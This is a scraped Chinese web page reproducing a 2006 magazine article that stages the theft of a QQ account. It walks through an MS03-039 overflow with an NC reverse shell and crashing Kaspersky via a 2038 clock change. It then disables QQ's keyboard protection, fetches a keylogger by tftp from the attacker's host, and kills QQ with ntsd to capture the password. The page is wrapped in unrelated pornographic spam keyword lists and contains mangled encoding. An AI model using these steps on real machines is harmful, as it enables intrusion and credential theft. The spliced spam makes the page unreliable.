亚洲免费av电影一区二区三区,日韩爱爱视频,51精品视频一区二区三区,91视频爱爱,日韩欧美在线播放视频,中文字幕少妇AV,亚洲电影中文字幕,久久久久亚洲av成人网址,久久综合视频网站,国产在线不卡免费播放

        ?

        不凡的黑客幻想 揭開(kāi)QQ號(hào)被盜的謎團(tuán)

        2006-11-02 06:19:22SEAPIGLilyBaby
        計(jì)算機(jī)應(yīng)用文摘 2006年10期
        關(guān)鍵詞:卡巴斯基被盜木馬

        SEAPIG?。蹋椋欤拢幔猓?/p>

        猖狂的盜號(hào)者

        “阿Q,你的QQ被盜了。”我平靜地通知阿Q。

        “你就忽悠我吧,大哥?!?/p>

        “真的,不信你看:本號(hào)被盜,要想找回此號(hào)……”(圖1)

        正在打CS的阿Q,一骨碌就從桌子對(duì)面翻了過(guò)來(lái):“不是吧,我裝的可是卡巴斯基啊?!?/p>

        怎么辦?趕緊到http://service.qq.com/申訴,還好他記性比較好,填了申訴表里的一大堆問(wèn)題,但是要三天之后才有答復(fù)。

        當(dāng)初是我推薦阿Q裝卡巴斯基的,這下QQ號(hào)被盜了,我也挺過(guò)意不去。讓他仔細(xì)回憶一下被盜經(jīng)過(guò),阿Q說(shuō)曾經(jīng)碰到一次QQ突然關(guān)了,以為程序出錯(cuò)所以再次登錄,接著卡巴斯基也崩潰了。

        找找被盜的原因

        由此看來(lái),遭遇盜號(hào)木馬了。可令人不解的是,卡巴斯基怎么崩潰了呢?眾所周知,卡巴斯基的進(jìn)程保護(hù)相當(dāng)強(qiáng)大,除了“冰刃”能“殺”掉其進(jìn)程,無(wú)論是WinXP自帶的NTSD還是大名鼎鼎的PSkill都奈何不了。留下的惟一線索就是系統(tǒng)時(shí)間被改成了2038年,也就是這一改動(dòng)讓卡巴斯基放水了。

        說(shuō)裝了卡巴斯基,病毒木馬入侵的幾率比較小,那么系統(tǒng)漏洞的威脅就比較大了。用X-Scan一掃,MS03026、MS03039、MS03049、MS04011等高危溢出漏洞一大堆,慘不忍睹。

        “你哪年裝的系統(tǒng)啊?那么多重要的補(bǔ)丁都沒(méi)打,想必這就是盜號(hào)者下手的地方了?!?/p>

        “怎么下手?不凡你給我演示下,我要搞清楚,免得下次再中招?!?/p>

        模擬第一現(xiàn)場(chǎng)

        因?yàn)橐呀?jīng)知道了阿Q的電腦上有很多漏洞沒(méi)打補(bǔ)丁,我在自己的電腦上使用MS03039溢出工具,再加上NC反向連接,很輕松就獲取了CMD Shell(圖1)。具體方法請(qǐng)參考《激情溢出三部曲》(本刊今年2月上旬刊),在此不再贅述。

        在獲取C M D S h e l l 后, 用“tasklist”查看進(jìn)程獲知裝有卡巴斯基。面對(duì)虎視眈眈的卡巴斯基,要想上傳盜號(hào)工具難于上青天,關(guān)鍵在于卡巴斯基的相關(guān)進(jìn)程沒(méi)法終止。可最近卡巴斯基爆出了2038漏洞,只要修改一下時(shí)間,卡巴斯基就崩潰了,這就給了盜號(hào)者可乘之機(jī)(以下乃模擬盜號(hào)情景,切勿模仿)。

        我又從硬盤(pán)里找出兩個(gè)工具,《窗口鍵盤(pán)記錄器》和TFTP32,前者用于捕捉鍵盤(pán)記錄,用后者把它送到阿Q的電腦里去。

        將《窗口鍵盤(pán)記錄器》主程序keylog放至TFTP32所在目錄,運(yùn)行TFTP32開(kāi)啟FTP服務(wù)(圖3)。圖標(biāo)還在,給人還在運(yùn)行的假象。

        QQ2005 Beta3之后的版本對(duì)鍵盤(pán)輸入采取了保護(hù)措施,使得鍵盤(pán)記錄程序無(wú)法捕獲輸入字符。將QQ安裝目錄下的npkcrypt.vxd、npkcrypt.sys、npkcusb.sys三個(gè)文件刪除后,鍵盤(pán)保護(hù)就失效了。再刪除LoginUinList.dat,這樣可以清除QQ記錄的號(hào)碼,在登錄時(shí)要重新輸入。

        利用“tftp –i 192.168.1.9 GET keylog.e x e”命令將鍵盤(pán)記錄程序上傳至目標(biāo)主機(jī)并運(yùn)行。用tasklist命令獲取QQ進(jìn)程的P I D,再用“ntsd -c q -p PID”結(jié)束Q Q 進(jìn)程。5分鐘之后,將C : WindowsSystem32目錄下的11111.txt拷貝過(guò)來(lái),里面就有QQ賬號(hào)和密碼(圖6)。

        “這,這就被偷走了???” 阿Q目瞪口呆。

        “對(duì)付不設(shè)防的電腦,那還不是輕而易舉。快回去重裝系統(tǒng)并打補(bǔ)丁吧?!?/p>

        本文中所涉及到的圖表、注解、公式等內(nèi)容請(qǐng)以PDF格式閱讀原文。

        猜你喜歡
        卡巴斯基被盜木馬
        小木馬
        騎木馬
        小木馬
        旋轉(zhuǎn)木馬
        名畫(huà)被盜
        卡巴斯基安全軟件榮膺AV—Test2014年度大獎(jiǎng)
        卡巴斯基企業(yè)級(jí)產(chǎn)品榮膺歐洲SC雜志權(quán)威獎(jiǎng)項(xiàng)
        藝術(shù)品被盜
        卡巴斯基解決方案與Windows 8.1實(shí)現(xiàn)兼容
        2013卡巴斯基三大安全事件
        18级成人毛片免费观看| 狠狠躁夜夜躁人人爽天天不卡| 天天躁日日躁狠狠躁一区| а的天堂网最新版在线| 在线观看av片永久免费| 黄色网页在线观看一区二区三区| 国产中文字幕亚洲综合| 日韩精品久久伊人中文字幕| 一区二区精品天堂亚洲av| 日韩女同视频在线网站| 无码人妻精品一区二区三区夜夜嗨 | 欧美丰满熟妇aaaaa片| 男女肉粗暴进来120秒动态图| 在线观看国产精品91| 亚洲色图偷拍自拍亚洲色图| 亚洲av天堂一区二区| 免费一区二区三区女优视频| 最新中文字幕人妻少妇| 无码国产精品一区二区免费式芒果| 亚洲精品乱码久久久久久金桔影视| 中文亚洲成a人片在线观看| 国产精品卡一卡二卡三| 久久久久国产一级毛片高清版A | 成人影院yy111111在线| 亚洲aⅴ无码成人网站国产app | 国产在线观看一区二区三区av| 亚洲国产精品成人天堂| 大桥未久亚洲无av码在线| 一本一道av无码中文字幕| 女人夜夜春高潮爽a∨片传媒| 久久久久久久国产精品电影| 人妻少妇精品系列一区二区| 精品国产一区二区三区香| 一本久道竹内纱里奈中文字幕| 大桥未久av一区二区三区| 色www视频永久免费| 亚洲男人的天堂在线播放| 亚洲无线码一区在线观看| 91精品亚洲熟妇少妇| 99国产精品99久久久久久| 久久99精品国产99久久6尤物|